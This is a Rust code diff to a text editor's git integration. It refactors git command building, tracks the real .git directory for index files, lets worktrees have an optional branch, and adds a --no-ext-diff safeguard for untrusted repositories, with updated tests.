+ rescan_count
+ );
+
+ assert!(
+ missed_paths.is_empty() || rescan_count > 0,
+ "missed {} paths without rescan being reported",
+ missed_paths.len()
+ );
+}
@@ -58,7 +58,7 @@ async fn run_git_blame(
let mut child = {
let span = ztracing::debug_span!("spawning git-blame command", path = path.as_unix_str());
let _enter = span.enter();
- git.build_command(["blame", "--incremental", "--contents", "-"])
+ git.build_command(&["blame", "--incremental", "--contents", "-"])
.arg(path.as_unix_str())
.stdin(Stdio::piped())
.stdout(Stdio::piped())
@@ -81,7 +81,7 @@ pub(crate) async fn get_messages(git: &GitBinary, shas: &[Oid]) -> Result<HashMa
async fn get_messages_impl(git: &GitBinary, shas: &[Oid]) -> Result<Vec<String>> {
const MARKER: &str = "<MARKER>";
let output = git
- .build_command(["show"])
+ .build_command(&["show"])
.arg("-s")
.arg(format!("--format=%B{}", MARKER))
.args(shas.iter().map(ToString::to_string))
@@ -91,7 +91,7 @@ async fn get_messages_impl(git: &GitBinary, shas: &[Oid]) -> Result<Vec<String>>
anyhow::ensure!(
output.status.success(),
"'git show' failed with error {:?}",
- output.status
+ String::from_utf8_lossy(&output.stderr)
);
Ok(String::from_utf8_lossy(&output.stdout)
.trim()
@@ -36,7 +36,7 @@ use thiserror::Error;
use util::command::{Stdio, new_command};
use util::paths::PathStyle;
use util::rel_path::RelPath;
-use util::{ResultExt, normalize_path, paths};
+use util::{ResultExt, paths};
use uuid::Uuid;
pub use askpass::{AskPassDelegate, AskPassResult, AskPassSession};
@@ -76,97 +76,6 @@ pub fn original_repo_path_from_common_dir(common_dir: &Path) -> PathBuf {
}
}
-/// Resolves the configured worktree directory to an absolute path.
-///
-/// `worktree_directory_setting` is the raw string from the user setting
-/// (e.g. `"../worktrees"`, `".git/zed-worktrees"`, `"my-worktrees/"`).
-/// Trailing slashes are stripped. The path is resolved relative to
-/// `working_directory` (the repository's working directory root).
-///
-/// When the resolved directory falls outside the working directory
-/// (e.g. `"../worktrees"`), the repository's directory name is
-/// automatically appended so that sibling repos don't collide.
-/// For example, with working directory `~/code/zed` and setting
-/// `"../worktrees"`, this returns `~/code/worktrees/zed`.
-///
-/// When the resolved directory is inside the working directory
-/// (e.g. `".git/zed-worktrees"`), no extra component is added
-/// because the path is already project-scoped.
-pub fn resolve_worktree_directory(
- working_directory: &Path,
- worktree_directory_setting: &str,
-) -> PathBuf {
- let trimmed = worktree_directory_setting.trim_end_matches(['/', '\\']);
- let joined = working_directory.join(trimmed);
- let resolved = normalize_path(&joined);
-
- if resolved.starts_with(working_directory) {
- resolved
- } else if let Some(repo_dir_name) = working_directory.file_name() {
- resolved.join(repo_dir_name)
- } else {
- resolved
- }
-}
-
-/// Validates that the resolved worktree directory is acceptable:
-/// - The setting must not be an absolute path.
-/// - The resolved path must be either a subdirectory of the working
-/// directory or a subdirectory of its parent (i.e., a sibling).
-///
-/// Returns `Ok(resolved_path)` or an error with a user-facing message.
-pub fn validate_worktree_directory(
- working_directory: &Path,
- worktree_directory_setting: &str,
-) -> Result<PathBuf> {
- // Check the original setting before trimming, since a path like "///"
- // is absolute but becomes "" after stripping trailing separators.
- // Also check for leading `/` or `\` explicitly, because on Windows
- // `Path::is_absolute()` requires a drive letter — so `/tmp/worktrees`
- // would slip through even though it's clearly not a relative path.
- if Path::new(worktree_directory_setting).is_absolute()
- || worktree_directory_setting.starts_with('/')
- || worktree_directory_setting.starts_with('\\')
- {
- anyhow::bail!(
- "git.worktree_directory must be a relative path, got: {worktree_directory_setting:?}"
- );
- }
-
- if worktree_directory_setting.is_empty() {
- anyhow::bail!("git.worktree_directory must not be empty");
- }
-
- let trimmed = worktree_directory_setting.trim_end_matches(['/', '\\']);
- if trimmed == ".." {
- anyhow::bail!("git.worktree_directory must not be \"..\" (use \"../some-name\" instead)");
- }
-
- let resolved = resolve_worktree_directory(working_directory, worktree_directory_setting);
-
- let parent = working_directory.parent().unwrap_or(working_directory);
-
- if !resolved.starts_with(parent) {
- anyhow::bail!(
- "git.worktree_directory resolved to {resolved:?}, which is outside \
- the project root and its parent directory. It must resolve to a \
- subdirectory of {working_directory:?} or a sibling of it."
- );
- }
-
- Ok(resolved)
-}
-
-/// Returns the full absolute path for a specific branch's worktree
-/// given the resolved worktree directory.
-pub fn worktree_path_for_branch(
- working_directory: &Path,
- worktree_directory_setting: &str,
- branch: &str,
-) -> PathBuf {
- resolve_worktree_directory(working_directory, worktree_directory_setting).join(branch)
-}
-
/// Commit data needed for the git graph visualization.
#[derive(Debug, Clone)]
pub struct GraphCommitData {
@@ -303,18 +212,25 @@ impl Branch {
#[derive(Clone, Debug, Hash, PartialEq, Eq)]
pub struct Worktree {
pub path: PathBuf,
- pub ref_name: SharedString,
+ pub ref_name: Option<SharedString>,
// todo(git_worktree) This type should be a Oid
pub sha: SharedString,
}
impl Worktree {
- pub fn branch(&self) -> &str {
- self.ref_name
- .as_ref()
- .strip_prefix("refs/heads/")
- .or_else(|| self.ref_name.as_ref().strip_prefix("refs/remotes/"))
- .unwrap_or(self.ref_name.as_ref())
+ /// Returns a display name for the worktree, suitable for use in the UI.
+ ///
+ /// If the worktree is attached to a branch, returns the branch name.
+ /// Otherwise, returns the short SHA of the worktree's HEAD commit.
+ pub fn display_name(&self) -> &str {
+ match self.ref_name {
+ Some(ref ref_name) => ref_name
+ .strip_prefix("refs/heads/")
+ .or_else(|| ref_name.strip_prefix("refs/remotes/"))
+ .unwrap_or(ref_name),
+ // Detached HEAD — show the short SHA as a fallback.
+ None => &self.sha[..self.sha.len().min(SHORT_SHA_LENGTH)],
+ }
}
}
@@ -342,12 +258,10 @@ pub fn parse_worktrees_from_str<T: AsRef<str>>(raw_worktrees: T) -> Vec<Worktree
// Ignore other lines: detached, bare, locked, prunable, etc.
}
- // todo(git_worktree) We should add a test for detach head state
- // a detach head will have ref_name as none so we would skip it
- if let (Some(path), Some(sha), Some(ref_name)) = (path, sha, ref_name) {
+ if let (Some(path), Some(sha)) = (path, sha) {
worktrees.push(Worktree {
path: PathBuf::from(path),
- ref_name: ref_name.into(),
+ ref_name: ref_name.map(Into::into),
sha: sha.into(),
})
}
@@ -763,14 +677,14 @@ pub trait GitRepository: Send + Sync {
-> BoxFuture<'_, Result<()>>;
fn rename_branch(&self, branch: String, new_name: String) -> BoxFuture<'_, Result<()>>;
- fn delete_branch(&self, name: String) -> BoxFuture<'_, Result<()>>;
+ fn delete_branch(&self, is_remote: bool, name: String) -> BoxFuture<'_, Result<()>>;
fn worktrees(&self) -> BoxFuture<'_, Result<Vec<Worktree>>>;
fn create_worktree(
&self,
- name: String,
- directory: PathBuf,
+ branch_name: String,
+ path: PathBuf,
from_commit: Option<String>,
) -> BoxFuture<'_, Result<()>>;
@@ -1000,11 +914,18 @@ impl RealGitRepository {
bundled_git_binary_path: Option<PathBuf>,
system_git_binary_path: Option<PathBuf>,
executor: BackgroundExecutor,
- ) -> Option<Self> {
- let any_git_binary_path = system_git_binary_path.clone().or(bundled_git_binary_path)?;
- let workdir_root = dotgit_path.parent()?;
- let repository = git2::Repository::open(workdir_root).log_err()?;
- Some(Self {
+ ) -> Result<Self> {
+ let any_git_binary_path = system_git_binary_path
+ .clone()
+ .or(bundled_git_binary_path)
+ .context("no git binary available")?;
+ log::info!(
+ "opening git repository at {dotgit_path:?} using git binary {any_git_binary_path:?}"
+ );
+ let workdir_root = dotgit_path.parent().context(".git has no parent")?;
+ let repository =
+ git2::Repository::open(workdir_root).context("creating libgit2 repository")?;
+ Ok(Self {
repository: Arc::new(Mutex::new(repository)),
system_git_binary_path,
any_git_binary_path,
@@ -1027,6 +948,7 @@ impl RealGitRepository {
self.any_git_binary_path.clone(),
self.working_directory()
.with_context(|| "Can't run git commands without a working directory")?,
+ self.path(),
self.executor.clone(),
self.is_trusted(),
))
@@ -1039,7 +961,7 @@ impl RealGitRepository {
let git_binary = self.git_binary();
let output: SharedString = self
.executor
- .spawn(async move { git_binary?.run(["help", "-a"]).await })
+ .spawn(async move { git_binary?.run(&["help", "-a"]).await })
.await
.unwrap_or_default()
.into();
@@ -1081,14 +1003,18 @@ pub async fn get_git_committer(cx: &AsyncApp) -> GitCommitter {
let git = GitBinary::new(
git_binary_path.unwrap_or(PathBuf::from("git")),
paths::home_dir().clone(),
+ paths::home_dir().join(".git"),
cx.background_executor().clone(),
true,
);
cx.background_spawn(async move {
- let name = git.run(["config", "--global", "user.name"]).await.log_err();
+ let name = git
+ .run(&["config", "--global", "user.name"])
+ .await
+ .log_err();
let email = git
- .run(["config", "--global", "user.email"])
+ .run(&["config", "--global", "user.email"])
.await
.log_err();
GitCommitter { name, email }
@@ -1119,7 +1045,7 @@ impl GitRepository for RealGitRepository {
.spawn(async move {
let git = git_binary?;
let output = git
- .build_command([
+ .build_command(&[
"--no-optional-locks",
"show",
"--no-patch",
@@ -1157,7 +1083,7 @@ impl GitRepository for RealGitRepository {
cx.background_spawn(async move {
let git = git_binary?;
let show_output = git
- .build_command([
+ .build_command(&[
"--no-optional-locks",
"show",
"--format=",
@@ -1179,7 +1105,7 @@ impl GitRepository for RealGitRepository {
let parent_sha = format!("{}^", commit);
let mut cat_file_process = git
- .build_command(["--no-optional-locks", "cat-file", "--batch=%(objectsize)"])
+ .build_command(&["--no-optional-locks", "cat-file", "--batch=%(objectsize)"])
.stdin(Stdio::piped())
.stdout(Stdio::piped())
.stderr(Stdio::piped())
@@ -1295,7 +1221,7 @@ impl GitRepository for RealGitRepository {
let git = git_binary?;
let output = git
- .build_command(["reset", mode_flag, &commit])
+ .build_command(&["reset", mode_flag, &commit])
.envs(env.iter())
.output()
.await?;
@@ -1323,7 +1249,7 @@ impl GitRepository for RealGitRepository {
let git = git_binary?;
let output = git
- .build_command(["checkout", &commit, "--"])
+ .build_command(&["checkout", &commit, "--"])
.envs(env.iter())
.args(paths.iter().map(|path| path.as_unix_str()))
.output()
@@ -1427,7 +1353,7 @@ impl GitRepository for RealGitRepository {
if let Some(content) = content {
let mut child = git
- .build_command(["hash-object", "-w", "--stdin"])
+ .build_command(&["hash-object", "-w", "--stdin"])
.envs(env.iter())
.stdin(Stdio::piped())
.stdout(Stdio::piped())
@@ -1442,7 +1368,7 @@ impl GitRepository for RealGitRepository {
log::debug!("indexing SHA: {sha}, path {path:?}");
let output = git
- .build_command(["update-index", "--add", "--cacheinfo", mode, sha])
+ .build_command(&["update-index", "--add", "--cacheinfo", mode, sha])
.envs(env.iter())
.arg(path.as_unix_str())
.output()
@@ -1456,7 +1382,7 @@ impl GitRepository for RealGitRepository {
} else {
log::debug!("removing path {path:?} from the index");
let output = git
- .build_command(["update-index", "--force-remove"])
+ .build_command(&["update-index", "--force-remove"])
.envs(env.iter())
.arg(path.as_unix_str())
.output()
@@ -1491,7 +1417,7 @@ impl GitRepository for RealGitRepository {
.spawn(async move {
let git = git_binary?;
let mut process = git
- .build_command([
+ .build_command(&[
"--no-optional-locks",
"cat-file",
"--batch-check=%(objectname)",
@@ -1551,7 +1477,7 @@ impl GitRepository for RealGitRepository {
let args = git_status_args(path_prefixes);
log::debug!("Checking for git status in {path_prefixes:?}");
self.executor.spawn(async move {
- let output = git.build_command(args).output().await?;
+ let output = git.build_command(&args).output().await?;
if output.status.success() {
let stdout = String::from_utf8_lossy(&output.stdout);
stdout.parse()
@@ -1589,7 +1515,7 @@ impl GitRepository for RealGitRepository {
self.executor
.spawn(async move {
- let output = git.build_command(args).output().await?;
+ let output = git.build_command(&args).output().await?;
if output.status.success() {
let stdout = String::from_utf8_lossy(&output.stdout);
stdout.parse()
@@ -1645,7 +1571,7 @@ impl GitRepository for RealGitRepository {
&fields,
];
let git = git_binary?;
- let output = git.build_command(args).output().await?;
+ let output = git.build_command(&args).output().await?;
anyhow::ensure!(
output.status.success(),
@@ -1659,7 +1585,7 @@ impl GitRepository for RealGitRepository {
if branches.is_empty() {
let args = vec!["symbolic-ref", "--quiet", "HEAD"];
- let output = git.build_command(args).output().await?;
+ let output = git.build_command(&args).output().await?;
// git symbolic-ref returns a non-0 exit code if HEAD points
// to something other than a branch
@@ -1702,20 +1628,19 @@ impl GitRepository for RealGitRepository {
fn create_worktree(
&self,
- name: String,
- directory: PathBuf,
+ branch_name: String,
+ path: PathBuf,
from_commit: Option<String>,
) -> BoxFuture<'_, Result<()>> {
let git_binary = self.git_binary();
- let final_path = directory.join(&name);
let mut args = vec![
OsString::from("--no-optional-locks"),
OsString::from("worktree"),
OsString::from("add"),
OsString::from("-b"),
- OsString::from(name.as_str()),
+ OsString::from(branch_name.as_str()),
OsString::from("--"),
- OsString::from(final_path.as_os_str()),
+ OsString::from(path.as_os_str()),
];
if let Some(from_commit) = from_commit {
args.push(OsString::from(from_commit));
@@ -1725,9 +1650,9 @@ impl GitRepository for RealGitRepository {
self.executor
.spawn(async move {
- std::fs::create_dir_all(final_path.parent().unwrap_or(&final_path))?;
+ std::fs::create_dir_all(path.parent().unwrap_or(&path))?;
let git = git_binary?;
- let output = git.build_command(args).output().await?;
+ let output = git.build_command(&args).output().await?;
if output.status.success() {
Ok(())
} else {
@@ -1753,7 +1678,7 @@ impl GitRepository for RealGitRepository {
}
args.push("--".into());
args.push(path.as_os_str().into());
- git_binary?.run(args).await?;
+ git_binary?.run(&args).await?;
anyhow::Ok(())
})
.boxed()
@@ -1772,7 +1697,7 @@ impl GitRepository for RealGitRepository {
old_path.as_os_str().into(),
new_path.as_os_str().into(),
];
- git_binary?.run(args).await?;
+ git_binary?.run(&args).await?;
anyhow::Ok(())
})
.boxed()
@@ -1856,12 +1781,14 @@ impl GitRepository for RealGitRepository {
.boxed()
}
- fn delete_branch(&self, name: String) -> BoxFuture<'_, Result<()>> {
+ fn delete_branch(&self, is_remote: bool, name: String) -> BoxFuture<'_, Result<()>> {
let git_binary = self.git_binary();
self.executor
.spawn(async move {
- git_binary?.run(&["branch", "-d", &name]).await?;
+ git_binary?
+ .run(&["branch", if is_remote { "-dr" } else { "-d" }, &name])
+ .await?;
anyhow::Ok(())
})
.boxed()
@@ -1975,11 +1902,11 @@ impl GitRepository for RealGitRepository {
let git = git_binary?;
let output = match diff {
DiffType::HeadToIndex => {
- git.build_command(["diff", "--staged"]).output().await?
+ git.build_command(&["diff", "--staged"]).output().await?
}
- DiffType::HeadToWorktree => git.build_command(["diff"]).output().await?,
+ DiffType::HeadToWorktree => git.build_command(&["diff"]).output().await?,
DiffType::MergeBase { base_ref } => {
- git.build_command(["diff", "--merge-base", base_ref.as_ref()])
+ git.build_command(&["diff", "--merge-base", base_ref.as_ref()])
.output()
.await?
}
@@ -2036,7 +1963,7 @@ impl GitRepository for RealGitRepository {
if !paths.is_empty() {
let git = git_binary?;
let output = git
- .build_command(["update-index", "--add", "--remove", "--"])
+ .build_command(&["update-index", "--add", "--remove", "--"])
.envs(env.iter())
.args(paths.iter().map(|p| p.as_unix_str()))
.output()
@@ -2064,7 +1991,7 @@ impl GitRepository for RealGitRepository {
if !paths.is_empty() {
let git = git_binary?;
let output = git
- .build_command(["reset", "--quiet", "--"])
+ .build_command(&["reset", "--quiet", "--"])
.envs(env.iter())
.args(paths.iter().map(|p| p.as_std_path()))
.output()
@@ -2091,7 +2018,7 @@ impl GitRepository for RealGitRepository {
.spawn(async move {
let git = git_binary?;
let output = git
- .build_command(["stash", "push", "--quiet", "--include-untracked"])
+ .build_command(&["stash", "push", "--quiet", "--include-untracked"])
.envs(env.iter())
.args(paths.iter().map(|p| p.as_unix_str()))
.output()
@@ -2196,7 +2123,7 @@ impl GitRepository for RealGitRepository {
// which we want to block on.
async move {
let git = git_binary?;
- let mut cmd = git.build_command(["commit", "--quiet", "-m"]);
+ let mut cmd = git.build_command(&["commit", "--quiet", "-m"]);
cmd.envs(env.iter())
.arg(&message.to_string())
.arg("--cleanup=strip")
@@ -2234,6 +2161,7 @@ impl GitRepository for RealGitRepository {
cx: AsyncApp,
) -> BoxFuture<'_, Result<RemoteCommandOutput>> {
let working_directory = self.working_directory();
+ let git_directory = self.path();
let executor = cx.background_executor().clone();
let git_binary_path = self.system_git_binary_path.clone();
let is_trusted = self.is_trusted();
@@ -2245,10 +2173,11 @@ impl GitRepository for RealGitRepository {
let git = GitBinary::new(
git_binary_path,
working_directory,
+ git_directory,
executor.clone(),
is_trusted,
);
- let mut command = git.build_command(["push"]);
+ let mut command = git.build_command(&["push"]);
command
.envs(env.iter())
.args(options.map(|option| match option {
@@ -2276,6 +2205,7 @@ impl GitRepository for RealGitRepository {
cx: AsyncApp,
) -> BoxFuture<'_, Result<RemoteCommandOutput>> {
let working_directory = self.working_directory();
+ let git_directory = self.path();
let executor = cx.background_executor().clone();
let git_binary_path = self.system_git_binary_path.clone();
let is_trusted = self.is_trusted();
@@ -2287,10 +2217,11 @@ impl GitRepository for RealGitRepository {
let git = GitBinary::new(
git_binary_path,
working_directory,
+ git_directory,
executor.clone(),
is_trusted,
);
- let mut command = git.build_command(["pull"]);
+ let mut command = git.build_command(&["pull"]);
command.envs(env.iter());
if rebase {
@@ -2316,6 +2247,7 @@ impl GitRepository for RealGitRepository {
cx: AsyncApp,
) -> BoxFuture<'_, Result<RemoteCommandOutput>> {
let working_directory = self.working_directory();
+ let git_directory = self.path();
let remote_name = format!("{}", fetch_options);
let git_binary_path = self.system_git_binary_path.clone();
let executor = cx.background_executor().clone();
@@ -2328,10 +2260,11 @@ impl GitRepository for RealGitRepository {
let git = GitBinary::new(
git_binary_path,
working_directory,
+ git_directory,
executor.clone(),
is_trusted,
);
- let mut command = git.build_command(["fetch", &remote_name]);
+ let mut command = git.build_command(&["fetch", &remote_name]);
command
.envs(env.iter())
.stdout(Stdio::piped())
@@ -2348,7 +2281,7 @@ impl GitRepository for RealGitRepository {
.spawn(async move {
let git = git_binary?;
let output = git
- .build_command(["rev-parse", "--abbrev-ref"])
+ .build_command(&["rev-parse", "--abbrev-ref"])
.arg(format!("{branch}@{{push}}"))
.output()
.await?;
@@ -2373,7 +2306,7 @@ impl GitRepository for RealGitRepository {
.spawn(async move {
let git = git_binary?;
let output = git
- .build_command(["config", "--get"])
+ .build_command(&["config", "--get"])
.arg(format!("branch.{branch}.remote"))
.output()
.await?;
@@ -2394,7 +2327,7 @@ impl GitRepository for RealGitRepository {
self.executor
.spawn(async move {
let git = git_binary?;
- let output = git.build_command(["remote", "-v"]).output().await?;
+ let output = git.build_command(&["remote", "-v"]).output().await?;
anyhow::ensure!(
output.status.success(),
@@ -2725,7 +2658,7 @@ impl GitRepository for RealGitRepository {
async move {
let git = git_binary?;
- let mut command = git.build_command([
+ let mut command = git.build_command(&[
"log",
GRAPH_COMMIT_FORMAT,
log_order.as_arg(),
@@ -2808,7 +2741,7 @@ async fn run_commit_data_reader(
request_rx: smol::channel::Receiver<CommitDataRequest>,
) -> Result<()> {
let mut process = git
- .build_command(["--no-optional-locks", "cat-file", "--batch"])
+ .build_command(&["--no-optional-locks", "cat-file", "--batch"])
.stdin(Stdio::piped())
.stdout(Stdio::piped())
.stderr(Stdio::piped())
@@ -2980,6 +2913,7 @@ async fn exclude_files(git: &GitBinary) -> Result<GitExcludeOverride> {
pub(crate) struct GitBinary {
git_binary_path: PathBuf,
working_directory: PathBuf,
+ git_directory: PathBuf,
executor: BackgroundExecutor,
index_file_path: Option<PathBuf>,
envs: HashMap<String, String>,
@@ -2990,12 +2924,14 @@ impl GitBinary {
pub(crate) fn new(
git_binary_path: PathBuf,
working_directory: PathBuf,
+ git_directory: PathBuf,
executor: BackgroundExecutor,
is_trusted: bool,
) -> Self {
Self {
git_binary_path,
working_directory,
+ git_directory,
executor,
index_file_path: None,
envs: HashMap::default(),
@@ -3041,12 +2977,9 @@ impl GitBinary {
// Copy the default index file so that Git doesn't have to rebuild the
// whole index from scratch. This might fail if this is an empty repository.
- smol::fs::copy(
- self.working_directory.join(".git").join("index"),
- &index_file_path,
- )
- .await
- .ok();
+ smol::fs::copy(self.git_directory.join("index"), &index_file_path)
+ .await
+ .ok();
self.index_file_path = Some(index_file_path.clone());
let result = f(self).await;
@@ -3060,22 +2993,16 @@ impl GitBinary {
}
pub async fn with_exclude_overrides(&self) -> Result<GitExcludeOverride> {
- let path = self
- .working_directory
- .join(".git")
- .join("info")
- .join("exclude");
+ let path = self.git_directory.join("info").join("exclude");
GitExcludeOverride::new(path).await
}
fn path_for_index_id(&self, id: Uuid) -> PathBuf {
- self.working_directory
- .join(".git")
- .join(format!("index-{}.tmp", id))
+ self.git_directory.join(format!("index-{}.tmp", id))
}
- pub async fn run<S>(&self, args: impl IntoIterator<Item = S>) -> Result<String>
+ pub async fn run<S>(&self, args: &[S]) -> Result<String>
where
S: AsRef<OsStr>,
{
@@ -3087,7 +3014,7 @@ impl GitBinary {
}
/// Returns the result of the command without trimming the trailing newline.
- pub async fn run_raw<S>(&self, args: impl IntoIterator<Item = S>) -> Result<String>
+ pub async fn run_raw<S>(&self, args: &[S]) -> Result<String>
where
S: AsRef<OsStr>,
{
@@ -3105,10 +3032,7 @@ impl GitBinary {
}
#[allow(clippy::disallowed_methods)]
- pub(crate) fn build_command<S>(
- &self,
- args: impl IntoIterator<Item = S>,
- ) -> util::command::Command
+ pub(crate) fn build_command<S>(&self, args: &[S]) -> util::command::Command
where
S: AsRef<OsStr>,
{
@@ -3125,6 +3049,14 @@ impl GitBinary {
command.args(["-c", "diff.external="]);
}
command.args(args);
+
+ // If the `diff` command is being used, we'll want to add the
+ // `--no-ext-diff` flag when working on an untrusted repository,
+ // preventing any external diff programs from being invoked.
+ if !self.is_trusted && args.iter().any(|arg| arg.as_ref() == "diff") {
+ command.arg("--no-ext-diff");
+ }
+
if let Some(index_file_path) = self.index_file_path.as_ref() {
command.env("GIT_INDEX_FILE", index_file_path);
}
@@ -3373,6 +3305,8 @@ fn checkpoint_author_envs() -> HashMap<String, String> {
#[cfg(test)]
mod tests {
+ use std::fs;
+
use super::*;
use gpui::TestAppContext;
@@ -3390,11 +3324,12 @@ mod tests {
let git = GitBinary::new(
PathBuf::from("git"),
dir.path().to_path_buf(),
+ dir.path().join(".git"),
cx.executor(),
false,
);
let output = git
- .build_command(["version"])
+ .build_command(&["version"])
.output()
.await
.expect("git version should succeed");
@@ -3403,11 +3338,12 @@ mod tests {
let git = GitBinary::new(
PathBuf::from("git"),
dir.path().to_path_buf(),
+ dir.path().join(".git"),
cx.executor(),
false,
);
let output = git
- .build_command(["config", "--get", "core.fsmonitor"])
+ .build_command(&["config", "--get", "core.fsmonitor"])
.output()
.await
.expect("git config should run");
@@ -3422,11 +3358,12 @@ mod tests {
let git = GitBinary::new(
PathBuf::from("git"),
dir.path().to_path_buf(),
+ dir.path().join(".git"),
cx.executor(),
false,
);
let output = git
- .build_command(["config", "--get", "core.hooksPath"])
+ .build_command(&["config", "--get", "core.hooksPath"])
.output()
.await
.expect("git config should run");
@@ -3447,11 +3384,12 @@ mod tests {
let git = GitBinary::new(
PathBuf::from("git"),
dir.path().to_path_buf(),
+ dir.path().join(".git"),
cx.executor(),
true,
);
let output = git
- .build_command(["config", "--get", "core.fsmonitor"])
+ .build_command(&["config", "--get", "core.fsmonitor"])
.output()
.await
.expect("git config should run");
@@ -3465,11 +3403,12 @@ mod tests {
let git = GitBinary::new(
PathBuf::from("git"),
dir.path().to_path_buf(),
+ dir.path().join(".git"),
cx.executor(),
true,
);
let output = git
- .build_command(["config", "--get", "core.hooksPath"])
+ .build_command(&["config", "--get", "core.hooksPath"])
.output()
.await
.expect("git config should run");
@@ -3479,6 +3418,27 @@ mod tests {
);
}
+ #[gpui::test]
+ async fn test_path_for_index_id_uses_real_git_directory(cx: &mut TestAppContext) {
+ cx.executor().allow_parking();
+ let working_directory = PathBuf::from("/code/worktree");
+ let git_directory = PathBuf::from("/code/repo/.git/modules/worktree");
+ let git = GitBinary::new(
+ PathBuf::from("git"),
+ working_directory,
+ git_directory.clone(),
+ cx.executor(),
+ false,
+ );
+
+ let path = git.path_for_index_id(Uuid::nil());
+
+ assert_eq!(
+ path,
+ git_directory.join(format!("index-{}.tmp", Uuid::nil()))
+ );
+ }
+
#[gpui::test]
async fn test_checkpoint_basic(cx: &mut TestAppContext) {
disable_git_global_config();
@@ -3838,7 +3798,7 @@ mod tests {
assert_eq!(result.len(), 1);
assert_eq!(result[0].path, PathBuf::from("/home/user/project"));
assert_eq!(result[0].sha.as_ref(), "abc123def");
- assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main");
+ assert_eq!(result[0].ref_name, Some("refs/heads/main".into()));
// Multiple worktrees
let input = "worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n\
@@ -3846,23 +3806,30 @@ mod tests {
let result = parse_worktrees_from_str(input);
assert_eq!(result.len(), 2);
assert_eq!(result[0].path, PathBuf::from("/home/user/project"));
- assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main");
+ assert_eq!(result[0].ref_name, Some("refs/heads/main".into()));
assert_eq!(result[1].path, PathBuf::from("/home/user/project-wt"));
- assert_eq!(result[1].ref_name.as_ref(), "refs/heads/feature");
+ assert_eq!(result[1].ref_name, Some("refs/heads/feature".into()));
- // Detached HEAD entry (should be skipped since ref_name won't parse)
+ // Detached HEAD entry (included with ref_name: None)
let input = "worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n\
worktree /home/user/detached\nHEAD def456\ndetached\n\n";
let result = parse_worktrees_from_str(input);
- assert_eq!(result.len(), 1);
+ assert_eq!(result.len(), 2);
assert_eq!(result[0].path, PathBuf::from("/home/user/project"));
+ assert_eq!(result[0].ref_name, Some("refs/heads/main".into()));
+ assert_eq!(result[1].path, PathBuf::from("/home/user/detached"));
+ assert_eq!(result[1].ref_name, None);
+ assert_eq!(result[1].sha.as_ref(), "def456");
- // Bare repo entry (should be skipped)
+ // Bare repo entry (included with ref_name: None)
let input = "worktree /home/user/bare.git\nHEAD abc123\nbare\n\n\
worktree /home/user/project\nHEAD def456\nbranch refs/heads/main\n\n";
let result = parse_worktrees_from_str(input);
- assert_eq!(result.len(), 1);
- assert_eq!(result[0].path, PathBuf::from("/home/user/project"));
+ assert_eq!(result.len(), 2);
+ assert_eq!(result[0].path, PathBuf::from("/home/user/bare.git"));
+ assert_eq!(result[0].ref_name, None);
+ assert_eq!(result[1].path, PathBuf::from("/home/user/project"));
+ assert_eq!(result[1].ref_name, Some("refs/heads/main".into()));
// Extra porcelain lines (locked, prunable) should be ignored
let input = "worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n\
@@ -3871,11 +3838,14 @@ mod tests {
let result = parse_worktrees_from_str(input);
assert_eq!(result.len(), 3);
assert_eq!(result[0].path, PathBuf::from("/home/user/project"));
- assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main");
+ assert_eq!(result[0].ref_name, Some("refs/heads/main".into()));
assert_eq!(result[1].path, PathBuf::from("/home/user/locked-wt"));
- assert_eq!(result[1].ref_name.as_ref(), "refs/heads/locked-branch");
+ assert_eq!(result[1].ref_name, Some("refs/heads/locked-branch".into()));
assert_eq!(result[2].path, PathBuf::from("/home/user/prunable-wt"));
- assert_eq!(result[2].ref_name.as_ref(), "refs/heads/prunable-branch");
+ assert_eq!(
+ result[2].ref_name,
+ Some("refs/heads/prunable-branch".into())
+ );
// Leading/trailing whitespace on lines should be tolerated
let input =
@@ -3884,7 +3854,7 @@ mod tests {
assert_eq!(result.len(), 1);
assert_eq!(result[0].path, PathBuf::from("/home/user/project"));
assert_eq!(result[0].sha.as_ref(), "abc123");
- assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main");
+ assert_eq!(result[0].ref_name, Some("refs/heads/main".into()));
// Windows-style line endings should be handled
let input = "worktree /home/user/project\r\nHEAD abc123\r\nbranch refs/heads/main\r\n\r\n";
@@ -3892,89 +3862,79 @@ mod tests {
assert_eq!(result.len(), 1);
assert_eq!(result[0].path, PathBuf::from("/home/user/project"));
assert_eq!(result[0].sha.as_ref(), "abc123");
- assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main");
+ assert_eq!(result[0].ref_name, Some("refs/heads/main".into()));
}
- const TEST_WORKTREE_DIRECTORIES: &[&str] =
- &["../worktrees", ".git/zed-worktrees", "my-worktrees/"];
-
#[gpui::test]
async fn test_create_and_list_worktrees(cx: &mut TestAppContext) {
disable_git_global_config();
cx.executor().allow_parking();
- for worktree_dir_setting in TEST_WORKTREE_DIRECTORIES {
- let repo_dir = tempfile::tempdir().unwrap();
- git2::Repository::init(repo_dir.path()).unwrap();
+ let temp_dir = tempfile::tempdir().unwrap();
+ let repo_dir = temp_dir.path().join("repo");
+ let worktrees_dir = temp_dir.path().join("worktrees");
- let repo = RealGitRepository::new(
- &repo_dir.path().join(".git"),
- None,
- Some("git".into()),
- cx.executor(),
- )
- .unwrap();
+ fs::create_dir_all(&repo_dir).unwrap();
+ fs::create_dir_all(&worktrees_dir).unwrap();
- // Create an initial commit (required for worktrees)
- smol::fs::write(repo_dir.path().join("file.txt"), "content")
- .await
- .unwrap();
- repo.stage_paths(vec![repo_path("file.txt")], Arc::new(HashMap::default()))
- .await
- .unwrap();
- repo.commit(
- "Initial commit".into(),
- None,
- CommitOptions::default(),
- AskPassDelegate::new(&mut cx.to_async(), |_, _, _| {}),
- Arc::new(checkpoint_author_envs()),
- )
- .await
- .unwrap();
+ git2::Repository::init(&repo_dir).unwrap();
- // List worktrees — should have just the main one
- let worktrees = repo.worktrees().await.unwrap();
- assert_eq!(worktrees.len(), 1);
- assert_eq!(
- worktrees[0].path.canonicalize().unwrap(),
- repo_dir.path().canonicalize().unwrap()
- );
+ let repo = RealGitRepository::new(
+ &repo_dir.join(".git"),
+ None,
+ Some("git".into()),
+ cx.executor(),
+ )
+ .unwrap();
- // Create a new worktree
- repo.create_worktree(
- "test-branch".to_string(),
